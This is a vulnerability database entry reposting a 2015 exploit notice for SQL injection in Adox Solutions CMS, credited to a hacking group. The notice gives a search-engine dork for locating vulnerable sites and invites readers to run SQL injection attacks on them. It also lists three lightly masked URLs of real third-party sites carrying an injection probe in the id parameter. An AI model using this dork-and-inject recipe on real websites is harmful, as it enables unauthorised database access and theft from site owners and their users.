Adox Solutions CMS SQL Injection Vulnerability

2015.11.26
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title : Adox Solutions CMS SQL Injection Vulnerability # Date : 25/11/2015 # Exploit Author : Iran Cyber Security Group # Discovered By : 0x3a # Category : Web Application Bugs # Dork : intext:Powered Adox Solutions inurl:.php?id= # Tested On : Windows , Kali Linux # Home : Iran-Cyber.net # Proof Of Concept : First Find Targets By Searching The Dork In Search Engines Like Google,Bing,... Then You Can Run Your Sql Injection Attack :) # Demo : # http://www.ftc.cXXom.sa/group-info.php?id=10%27 # http://miralsteXel.com/projects-gallery.php?id=22%27 # http://adoxsoXlutions.in/projects/FTI/group-gallery.php?id=12%27 ------------------------------ Website : Iran-Cyber.Net # Thanks To : root3r | MOHAMAD-NOFOZI | KamraN HellisH | JOK3R | Pi.Hack | CRY$I$ BL4CK | WH!T3 W01F | 0day | Saiber89 And All Members Of Iran-Cyber.Net And My Leader


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top